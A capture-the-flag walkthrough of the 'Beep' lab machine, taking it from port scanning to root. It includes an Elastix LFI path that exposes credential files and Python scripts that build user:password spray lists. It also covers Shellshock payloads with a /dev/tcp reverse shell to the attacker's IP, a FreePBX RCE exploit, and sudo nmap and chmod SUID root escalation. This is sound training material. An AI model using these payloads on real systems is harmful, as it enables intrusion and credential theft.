# Beep

### Scanning

Scanning reveals a number of open ports:

```
┌──(kali㉿kali)-[~/Desktop]
└─$ sudo nmap -sS -sC -sV -O -T4 10.10.10.7 -oX beep.nmap
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-19 08:28 EDT
Nmap scan report for 10.10.10.7
Host is up (0.17s latency).
Not shown: 988 closed tcp ports (reset)
PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey: 
|   1024 adee5abb6937fb27afb83072a0f96f53 (DSA)
|_  2048 bcc6735913a18a4b550750f6651d6d0d (RSA)
25/tcp    open  smtp       Postfix smtpd
|_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN
80/tcp    open  http       Apache httpd 2.2.3
|_http-server-header: Apache/2.2.3 (CentOS)
|_http-title: Did not follow redirect to https://10.10.10.7/
110/tcp   open  pop3       Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_pop3-capabilities: AUTH-RESP-CODE APOP UIDL PIPELINING TOP IMPLEMENTATION(Cyrus POP3 server v2) RESP-CODES LOGIN-DELAY(0) USER EXPIRE(NEVER) STLS
111/tcp   open  rpcbind    2 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2            111/tcp   rpcbind
|   100000  2            111/udp   rpcbind
|   100024  1            875/udp   status
|_  100024  1            878/tcp   status
143/tcp   open  imap       Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_imap-capabilities: Completed UIDPLUS STARTTLS X-NETSCAPE LITERAL+ BINARY ACL CHILDREN URLAUTHA0001 LISTEXT OK IMAP4 ANNOTATEMORE THREAD=REFERENCES NO RIGHTS=kxte MAILBOX-REFERRALS CONDSTORE CATENATE LIST-SUBSCRIBED ID THREAD=ORDEREDSUBJECT IMAP4rev1 IDLE QUOTA SORT MULTIAPPEND ATOMIC SORT=MODSEQ NAMESPACE UNSELECT RENAME
443/tcp   open  ssl/http   Apache httpd 2.2.3 ((CentOS))
|_http-server-header: Apache/2.2.3 (CentOS)
|_ssl-date: 2023-07-19T12:32:31+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2017-04-07T08:22:08
|_Not valid after:  2018-04-07T08:22:08
993/tcp   open  ssl/imap   Cyrus imapd
|_imap-capabilities: CAPABILITY
995/tcp   open  pop3       Cyrus pop3d
3306/tcp  open  mysql      MySQL (unauthorized)
4445/tcp  open  upnotifyp?
10000/tcp open  http       MiniServ 1.570 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.93%E=4%D=7/19%OT=22%CT=1%CU=35489%PV=Y%DS=2%DC=I%G=Y%TM=64B7D8A
OS:0%P=x86_64-pc-linux-gnu)SEQ(SP=C9%GCD=1%ISR=CE%TI=Z%CI=Z%II=I%TS=A)OPS(O
OS:1=M53CST11NW7%O2=M53CST11NW7%O3=M53CNNT11NW7%O4=M53CST11NW7%O5=M53CST11N
OS:W7%O6=M53CST11)WIN(W1=16A0%W2=16A0%W3=16A0%W4=16A0%W5=16A0%W6=16A0)ECN(R
OS:=Y%DF=Y%T=40%W=16D0%O=M53CNNSNW7%CC=N%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%
OS:RD=0%Q=)T2(R=N)T3(R=Y%DF=Y%T=40%W=16A0%S=O%A=S+%F=AS%O=M53CST11NW7%RD=0%
OS:Q=)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%
OS:A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%
OS:DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIP
OS:L=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 2 hops
Service Info: Hosts:  beep.localdomain, 127.0.0.1, example.com

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 443.44 seconds

```
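The scan above was also written to XML with `-oX beep.nmap`. As an added example (not part of the original write-up, nor nmap's own code), here is a small parser for that XML that produces a port/service table and flags the services nmap only guessed. The XML embedded below is constructed from a few of the ports in the scan, in the attribute layout nmap uses; on a real file, pass its path on the command line. It also shows what the trailing `?` on `upnotifyp?` means: the name came from the nmap-services table (`method="table"`) rather than a matched probe, so that port is worth a manual look.

```python
"""Parse the XML written by `nmap -oX` into a port/service table.

Added example for this write-up, not code from the page or from nmap.
SAMPLE_XML is constructed from a subset of the Beep scan in nmap's layout.
"""
import sys
import xml.etree.ElementTree as ET

# Constructed sample: a subset of the Beep scan in nmap's XML layout.
SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" version="7.93">
<host><status state="up"/><address addr="10.10.10.7" addrtype="ipv4"/>
<ports>
<port protocol="tcp" portid="22"><state state="open"/>
 <service name="ssh" product="OpenSSH" version="4.3" extrainfo="protocol 2.0" method="probed" conf="10"/></port>
<port protocol="tcp" portid="443"><state state="open"/>
 <service name="http" product="Apache httpd" version="2.2.3" tunnel="ssl" method="probed" conf="10"/></port>
<port protocol="tcp" portid="3306"><state state="open"/>
 <service name="mysql" product="MySQL" extrainfo="unauthorized" method="probed" conf="10"/></port>
<port protocol="tcp" portid="4445"><state state="open"/>
 <service name="upnotifyp" method="table" conf="3"/></port>
<port protocol="tcp" portid="10000"><state state="open"/>
 <service name="http" product="MiniServ" version="1.570" extrainfo="Webmin httpd" method="probed" conf="10"/></port>
<port protocol="tcp" portid="8080"><state state="closed"/>
 <service name="http-proxy" method="table" conf="3"/></port>
</ports></host>
</nmaprun>
"""


def parse_nmap_xml(text):
    """Return one dict per OPEN port with host, port, proto and service attributes."""
    root = ET.fromstring(text)
    rows = []
    for host in root.iter("host"):
        addr = host.find("address").get("addr")
        for port in host.iter("port"):
            if port.find("state").get("state") != "open":
                continue  # closed/filtered ports carry no useful service data
            svc = port.find("service")
            attrs = svc.attrib if svc is not None else {}
            rows.append({
                "host": addr,
                "port": int(port.get("portid")),
                "proto": port.get("protocol"),
                "service": attrs.get("name", ""),
                "product": attrs.get("product", ""),
                "version": attrs.get("version", ""),
                "extrainfo": attrs.get("extrainfo", ""),
                "tunnel": attrs.get("tunnel", ""),      # "ssl" for ssl/http etc.
                "method": attrs.get("method", ""),      # "probed" or "table"
            })
    return rows


def unidentified(rows):
    """Ports whose service name is only a table guess (printed as 'name?' by nmap)."""
    return [r["port"] for r in rows if r["method"] != "probed"]


def banner(row):
    """Render a row roughly the way nmap's text output does."""
    svc = ("ssl/" if row["tunnel"] == "ssl" else "") + row["service"]
    if row["method"] != "probed":
        svc += "?"
    detail = " ".join(x for x in (row["product"], row["version"]) if x)
    if row["extrainfo"]:
        detail = (detail + " (%s)" % row["extrainfo"]).strip()
    parts = ["%d/%s" % (row["port"], row["proto"]), svc]
    if detail:
        parts.append(detail)
    return " ".join(parts)


if __name__ == "__main__":
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_XML
    rows = parse_nmap_xml(text)
    for row in rows:
        print(banner(row))
    print("guessed only:", unidentified(rows))
```

Run it as `python3 nmapxml.py beep.nmap` to get the table for the real scan; with no argument it runs on the embedded sample.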

### Web Enumeration

Both ports 80 and 443 are available, and Apache is running on both. The scan also gave us the hostname (beep.localdomain), so add it to /etc/hosts.

<figure><img src="/files/WDUhZYLf2tuWflnYoAfh" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/z1pxu4vuUWO0t1Uwmslr" alt=""><figcaption></figcaption></figure>

Visiting the site over HTTP redirects us to HTTPS, but the server only offers an old TLS version and Firefox refuses to connect:

<figure><img src="/files/cvbjffdOkrP4mtoNZ6e6" alt=""><figcaption></figcaption></figure>

To lower the browser's minimum TLS version, open a new tab and enter the following:

```
about:config
```

<figure><img src="/files/m7ihr1XiiN3BQshJ4LpJ" alt=""><figcaption></figcaption></figure>

Search for security.tls.version.min and change it to 1 (TLS 1.0). Set it back to the default once you are done, since this re-enables a deprecated protocol for every site, not just the target.

<figure><img src="/files/YHix0cPGSPIfnKpu5CFx" alt=""><figcaption></figcaption></figure>

Browsing again, we get the main Elastix page. robots.txt, the sitemap and the page source reveal nothing, so let's try directory brute-forcing.

ffuf didn't work for some reason. Gobuster saved the day and found a few directories (-k skips certificate validation, which the expired certificate would otherwise fail):

```
┌──(kali㉿kali)-[~/Desktop]
└─$ gobuster dir -u https://beep.localdomain/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -k -t 50
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     https://beep.localdomain/
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Timeout:                 10s
===============================================================
2023/07/19 09:25:32 Starting gobuster in directory enumeration mode
===============================================================
/images               (Status: 301) [Size: 322] [--> https://beep.localdomain/images/]
/help                 (Status: 301) [Size: 320] [--> https://beep.localdomain/help/]
/themes               (Status: 301) [Size: 322] [--> https://beep.localdomain/themes/]
/modules              (Status: 301) [Size: 323] [--> https://beep.localdomain/modules/]
/mail                 (Status: 301) [Size: 320] [--> https://beep.localdomain/mail/]
/admin                (Status: 301) [Size: 321] [--> https://beep.localdomain/admin/]
/static               (Status: 301) [Size: 322] [--> https://beep.localdomain/static/]
/lang                 (Status: 301) [Size: 320] [--> https://beep.localdomain/lang/]
```

Now try logging in to /admin:

<figure><img src="/files/IVnNGjUMlKo9U3mLeuQR" alt=""><figcaption></figcaption></figure>

We get an error page that reveals the FreePBX version, 2.8.1.4.

### Web exploitation with LFI

Now let's search for known vulnerabilities:

```
┌──(kali㉿kali)-[~/Desktop]
└─$ searchsploit Elastix
------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                       |  Path
------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Elastix - 'page' Cross-Site Scripting                                                                                                | php/webapps/38078.py
Elastix - Multiple Cross-Site Scripting Vulnerabilities                                                                              | php/webapps/38544.txt
Elastix 2.0.2 - Multiple Cross-Site Scripting Vulnerabilities                                                                        | php/webapps/34942.txt
Elastix 2.2.0 - 'graph.php' Local File Inclusion                                                                                     | php/webapps/37637.pl
Elastix 2.x - Blind SQL Injection                                                                                                    | php/webapps/36305.txt
Elastix < 2.5 - PHP Code Injection                                                                                                   | php/webapps/38091.php
FreePBX 2.10.0 / Elastix 2.2.0 - Remote Code Execution                                                                               | php/webapps/18650.py
------------------------------------------------------------------------------------------------------------------------------------- --------------------------------
```

So, first we target the LFI:

```
┌──(kali㉿kali)-[~/Desktop]
└─$ searchsploit -m php/webapps/37637.pl
  Exploit: Elastix 2.2.0 - 'graph.php' Local File Inclusion
      URL: https://www.exploit-db.com/exploits/37637
     Path: /usr/share/exploitdb/exploits/php/webapps/37637.pl
    Codes: N/A
 Verified: True
File Type: ASCII text
Copied to: /home/kali/Desktop/37637.pl
```

Opening it, we get the LFI path. The current_language parameter is included as a file path, and the %00 null byte truncates the extension PHP appends, so an arbitrary file can be read:

```
/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action
```

<figure><img src="/files/HemabL4Cl3W7lDLMtcDq" alt=""><figcaption></figcaption></figure>

Paste it into the browser to check whether we get the config file. We do:

<figure><img src="/files/2InnqDPllYbKlaY6H8rh" alt=""><figcaption></figcaption></figure>

Press Ctrl+U to view the page source, and we get a number of passwords. The commented lines are FreePBX's stock defaults (amp109, amp111); the uncommented values are the ones in use, and the same string has been set for both the database and the manager password:

```
AMPDBHOST=localhost
AMPDBENGINE=mysql
# AMPDBNAME=asterisk
AMPDBUSER=asteriskuser
# AMPDBPASS=amp109
AMPDBPASS=jEhdIekWmdjE
AMPENGINE=asterisk
AMPMGRUSER=admin
#AMPMGRPASS=amp111
AMPMGRPASS=jEhdIekWmdjE
```

<figure><img src="/files/AXCxXx4cdMclKtO6aNev" alt=""><figcaption></figcaption></figure>

Let's enumerate users by reading /etc/passwd through the same LFI:

<figure><img src="/files/C4B3cfQb5gjuzyFj46zV" alt=""><figcaption></figcaption></figure>

We get a number of users. Only the accounts with an interactive shell (/bin/bash) matter here: root, mysql, cyrus, asterisk, spamfilter and fanis.

```
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
distcache:x:94:94:Distcache:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
cyrus:x:76:12:Cyrus IMAP Server:/var/lib/imap:/bin/bash
dbus:x:81:81:System message bus:/:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
mailman:x:41:41:GNU Mailing List Manager:/usr/lib/mailman:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
asterisk:x:100:101:Asterisk VoIP PBX:/var/lib/asterisk:/bin/bash
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
spamfilter:x:500:500::/home/spamfilter:/bin/bash
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
fanis:x:501:501::/home/fanis:/bin/bash
Sorry! Attempt to access restricted file.
```
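As an added example (not code from the page or from Elastix), the script below turns the two files read above into something usable: it builds the graph.php LFI URL for any path, separates the live amportal.conf values from the commented-out defaults, keeps only the /etc/passwd entries with an interactive shell, and pairs users with the recovered passwords into a list to try against SSH. The sample texts embedded in it are constructed from the output shown above so it runs offline. The null-byte comment is an assumption about the target's PHP version; the fact that the %00 truncation worked above confirms it holds here.

```python
"""Harvest credentials and shell users from files read through the
Elastix graph.php LFI (EDB-37637).

Added example for this write-up, not code from the page or from Elastix.
The LFI path is the one from the exploit above; the sample texts below are
constructed from the page's own output so the script runs offline.
"""

# Path from EDB-37637. The %00 relies on null-byte truncation of the
# extension PHP appends, which only works on PHP older than 5.3.4
# (assumed for this CentOS 5 box; the manual request above confirms it).
LFI_TEMPLATE = ("{base}/vtigercrm/graph.php?current_language="
                "../../../../../../../..//{target}%00&module=Accounts&action")

# Shells that do not give an interactive login.
NON_INTERACTIVE = {"/sbin/nologin", "/bin/false", "/bin/sync",
                   "/sbin/halt", "/sbin/shutdown", ""}

# Constructed sample: the amportal.conf excerpt shown above.
AMPORTAL_SAMPLE = """\
AMPDBHOST=localhost
AMPDBENGINE=mysql
# AMPDBNAME=asterisk
AMPDBUSER=asteriskuser
# AMPDBPASS=amp109
AMPDBPASS=jEhdIekWmdjE
AMPENGINE=asterisk
AMPMGRUSER=admin
#AMPMGRPASS=amp111
AMPMGRPASS=jEhdIekWmdjE
"""

# Constructed sample: a subset of the /etc/passwd lines shown above, plus
# the application's trailing error line that the LFI response carries.
PASSWD_SAMPLE = """\
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
news:x:9:13:news:/etc/news:
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
cyrus:x:76:12:Cyrus IMAP Server:/var/lib/imap:/bin/bash
apache:x:48:48:Apache:/var/www:/sbin/nologin
asterisk:x:100:101:Asterisk VoIP PBX:/var/lib/asterisk:/bin/bash
spamfilter:x:500:500::/home/spamfilter:/bin/bash
fanis:x:501:501::/home/fanis:/bin/bash
Sorry! Attempt to access restricted file.
"""


def lfi_url(base, target):
    """Build the graph.php LFI URL for an absolute path such as /etc/passwd."""
    return LFI_TEMPLATE.format(base=base.rstrip("/"), target=target.lstrip("/"))


def parse_amportal(text):
    """Split amportal.conf into (active, commented) KEY=VALUE dicts.

    Commented lines are FreePBX's stock defaults (amp109, amp111); the
    uncommented line for the same key is the value actually in use.
    """
    active, commented = {}, {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        dest = active
        if line.startswith("#"):
            dest = commented
            line = line.lstrip("#").strip()
        if "=" not in line:
            continue
        key, _, value = line.partition("=")
        dest[key.strip()] = value.strip()
    return active, commented


def shell_users(passwd_text):
    """Usernames from /etc/passwd whose login shell is interactive."""
    users = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) != 7:   # skips the app's error line and any HTML residue
            continue
        if fields[6].strip() not in NON_INTERACTIVE:
            users.append(fields[0])
    return users


def spray_targets(passwd_text, amportal_text):
    """Pair every interactive user with every distinct *PASS value in use."""
    active, _ = parse_amportal(amportal_text)
    passwords = sorted({v for k, v in active.items() if k.endswith("PASS")})
    return [(u, p) for u in shell_users(passwd_text) for p in passwords]


if __name__ == "__main__":
    print(lfi_url("https://10.10.10.7", "/etc/amportal.conf"))
    for user, pw in spray_targets(PASSWD_SAMPLE, AMPORTAL_SAMPLE):
        print("%s:%s" % (user, pw))
```

Feed the real LFI responses (saved from the browser's view-source, or fetched with curl -k) into `parse_amportal` and `shell_users`; the `spray_targets` output is the user:password list for the SSH step that follows.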

### Getting Access with SSH

As SSH is open, let's try it with the users and password we found. A current OpenSSH client refuses to connect because the server's algorithms (ssh-rsa host-key signatures and the diffie-hellman-group1-sha1 key exchange offered by OpenSSH 4.3) are disabled by default. Add the following to /etc/ssh/ssh_config (or to ~/.ssh/config, ideally inside a Host block for this target only, since it re-enables SHA-1-based algorithms client-wide):

<figure><img src="/files/Hx4RWWVbxfx43Tv5I7zU" alt=""><figcaption></figcaption></figure>

```
HostKeyAlgorithms = +ssh-rsa
PubkeyAcceptedAlgorithms = +ssh-rsa
```

Now SSH in, enabling the legacy key exchange for this connection only:

```
ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 root@10.10.10.7  
```

Use the password jEhdIekWmdjE and we are in, directly as root: the password from amportal.conf has been reused for the root account.

<figure><img src="/files/p2JzxqCJufjt4Iawq7SZ" alt=""><figcaption></figcaption></figure>

We got the flags.

<figure><img src="/files/YfQhpU8wX5xwPSfIpVpu" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/uzNHyKlxUjJlRNI1Wbry" alt=""><figcaption></figcaption></figure>

### Method 2

Webmin is running on port 10000 and gives full control of the machine. Trying the username root with the passwords I collected from the LFI, I can log in to Webmin with root / jEhdIekWmdjE. This interface is designed to administer the host and runs with full root access.

<figure><img src="/files/YcmOpdWAT2gW81APbVOj" alt=""><figcaption></figcaption></figure>

We can also change passwords

<figure><img src="/files/RbbIbYYrIJJ8XoucHEu3" alt=""><figcaption></figcaption></figure>

We can also schedule arbitrary commands. Let's schedule a reverse shell as a local user:

<figure><img src="/files/xNcNGjAODy3RM6StN4OF" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/c6qrqLyodDvtUPClGoiD" alt=""><figcaption></figcaption></figure>

And we get the reverse shell

<figure><img src="/files/TIjdWCId43ovESuql3iQ" alt=""><figcaption></figcaption></figure>

We could have obtained a root shell just as easily by scheduling the job as root instead.

### Method 3 - Exploiting Shellshock

From the Webmin login panel, initiate a login request, intercept it in Burp and send it to Repeater.

<figure><img src="/files/vfBcC9ipHXBvpS9dgURN" alt=""><figcaption></figcaption></figure>

Now set the User-Agent header to a Shellshock payload and try the following. The echo produces no visible output in the response, but the sleep delays the response by ten seconds, which confirms blind command execution:

```
() { :; };/bin/echo hello
() { :; }; sleep 10
```

To confirm it out-of-band, have the target ping us:

```
() { :; };ping -c 1 10.10.14.108
```

while capturing on our machine:

```
sudo tcpdump -i tun0 -v
```

The ping arrives, so let's try a reverse shell, with a listener waiting on port 9001 on our side. The same Shellshock prefix goes in front of it:

```
() { :; }; sh -i >& /dev/tcp/10.10.14.108/9001 0>&1
```

And we got the shell.

<figure><img src="/files/6srs8PR2KIRXZ3Pb4Gcd" alt=""><figcaption></figcaption></figure>
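To automate the sleep check above, here is an added example (not code from the page, nor from Webmin): it sends the Shellshock payload in the User-Agent over the legacy TLS that port 10000 speaks and decides blind execution purely from response timing, which is how you detect it when, as here, the command output never reaches the response. The host and port are the ones from the scan; the path "/" is a placeholder for the CGI hit by the intercepted login request, and the ten-second delay and two-second slack are assumptions you may need to tune for a slow link.

```python
"""Timing-based Shellshock (CVE-2014-6271) check against a CGI endpoint.

Added example for this write-up, not code from the page or from Webmin.
Assumptions: HOST/PORT are Webmin on this box, PATH is the CGI hit by the
intercepted login request ("/" is a placeholder; use the path from Burp),
and a 10 second sleep stands out clearly from normal latency.
"""
import http.client
import ssl
import time

HOST, PORT, PATH = "10.10.10.7", 10000, "/"
PREFIX = "() { :; }; "   # the function definition bash parses, then keeps executing


def shellshock_ua(cmd):
    """User-Agent value: anything after the definition runs when bash imports it."""
    return PREFIX + cmd


def legacy_tls_context():
    """Accept the expired self-signed cert and the old TLS this server speaks."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    ctx.minimum_version = ssl.TLSVersion.TLSv1
    try:
        ctx.set_ciphers("DEFAULT:@SECLEVEL=0")  # OpenSSL 3 rejects TLS 1.0 otherwise
    except ssl.SSLError:
        pass
    return ctx


def send_probe(user_agent, host=HOST, port=PORT, path=PATH, timeout=60):
    """One HTTPS request carrying the payload in User-Agent; returns (status, body)."""
    conn = http.client.HTTPSConnection(host, port, context=legacy_tls_context(),
                                       timeout=timeout)
    try:
        conn.request("GET", path, headers={"User-Agent": user_agent})
        resp = conn.getresponse()
        return resp.status, resp.read()
    finally:
        conn.close()


def timing_oracle(probe, delay=10, slack=2.0, clock=time.monotonic):
    """Decide blind command execution from response time alone.

    probe(cmd) must send cmd and block until the reply arrives. Returns True
    when 'sleep <delay>' costs at least delay - slack seconds more than a
    harmless baseline command. clock is injectable so the decision logic
    can be exercised without a live target.
    """
    start = clock()
    probe("true")
    baseline = clock() - start
    start = clock()
    probe("sleep %d" % delay)
    slowed = clock() - start
    return (slowed - baseline) >= (delay - slack)


def check_host(host=HOST, port=PORT, path=PATH):
    """True if the endpoint executes commands from the User-Agent header."""
    return timing_oracle(lambda cmd: send_probe(shellshock_ua(cmd), host, port, path))


if __name__ == "__main__":
    print("blind command execution:", check_host())
```

Measuring a baseline first matters: on a slow VPN a plain request can already take a second or two, and comparing against that rather than against zero keeps the check from being fooled by latency.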

### Method 4 - RCE in FreePBX/Elastix

The searchsploit run earlier also listed a remote code execution entry, "FreePBX 2.10.0 / Elastix 2.2.0 - Remote Code Execution" (php/webapps/18650.py).

Mirror that script:

```
searchsploit -m php/webapps/18650.py
```

The exploit needs a valid SIP extension, so scan for one with svwar (from SIPVicious):

```
┌──(kali㉿kali)-[~/Desktop]
└─$ svwar -m INVITE -e100-999 10.10.10.7
WARNING:TakeASip:using an INVITE scan on an endpoint (i.e. SIP phone) may cause it to ring and wake up people in the middle of the night

+-----------+----------------+
| Extension | Authentication |
+===========+================+
| 233       | reqauth        |
+-----------+----------------+
```

So we have a valid extension (233). Make the necessary changes in the script (target host, our host and port, and the extension) and start a listener on port 443.

<figure><img src="/files/ClyzfMhSS4coj3Izc9sF" alt=""><figcaption></figcaption></figure>

Now run the script and we get a shell, this time as the asterisk user rather than root, so privilege escalation is needed.

<figure><img src="/files/Pc0bcWdQgTdWyPj3tjlX" alt=""><figcaption></figcaption></figure>

### Priv Escalation

Run sudo -l to see which commands asterisk may run as root without a password:

```
bash-3.2$ sudo -l
Matching Defaults entries for asterisk on this host:
    env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR
    LS_COLORS MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE LC_COLLATE
    LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES LC_MONETARY LC_NAME LC_NUMERIC
    LC_PAPER LC_TELEPHONE LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET
    XAUTHORITY"

User asterisk may run the following commands on this host:
    (root) NOPASSWD: /sbin/shutdown
    (root) NOPASSWD: /usr/bin/nmap
    (root) NOPASSWD: /usr/bin/yum
    (root) NOPASSWD: /bin/touch
    (root) NOPASSWD: /bin/chmod
    (root) NOPASSWD: /bin/chown
    (root) NOPASSWD: /sbin/service
    (root) NOPASSWD: /sbin/init
    (root) NOPASSWD: /usr/sbin/postmap
    (root) NOPASSWD: /usr/sbin/postfix
    (root) NOPASSWD: /usr/sbin/saslpasswd2
    (root) NOPASSWD: /usr/sbin/hardware_detector
    (root) NOPASSWD: /sbin/chkconfig
    (root) NOPASSWD: /usr/sbin/elastix-helper
bash-3.2$ 

```

Use [GTFOBins](https://gtfobins.github.io/gtfobins/nmap/) as a reference; several of these entries lead to root on their own. Two are shown below.

#### Nmap priv esc

The --interactive mode (removed from modern Nmap, but present in the old release on this box) lets us run a shell from inside nmap, and sudo runs it as root:

```
sudo nmap --interactive
nmap> !sh
```

<figure><img src="/files/IunsUOpqRzEGrGSD2C2V" alt=""><figcaption></figcaption></figure>

#### chmod on root directory

Alternatively, give everyone read, write and execute permissions on /root so the asterisk user can traverse and list it:

```
sudo chmod o+rwx /root
```

#### chmod /bin/bash add suid permissions

`chmod` jumps out right away. I’ll pick a file, like `/bin/bash`, and set it to SUID:

```
bash-3.2$ ls -l /bin/bash
-rwxr-xr-x 1 root root 729292 Jan 22  2009 /bin/bash
bash-3.2$ sudo chmod 4755 /bin/bash
bash-3.2$ ls -l /bin/bash
-rwsr-xr-x 1 root root 729292 Jan 22  2009 /bin/bash
```

Now just run it (with `-p` to not drop privs) and get a root shell:

```
bash-3.2$ bash -p
bash-3.2# id
uid=100(asterisk) gid=101(asterisk) euid=0(root)
```

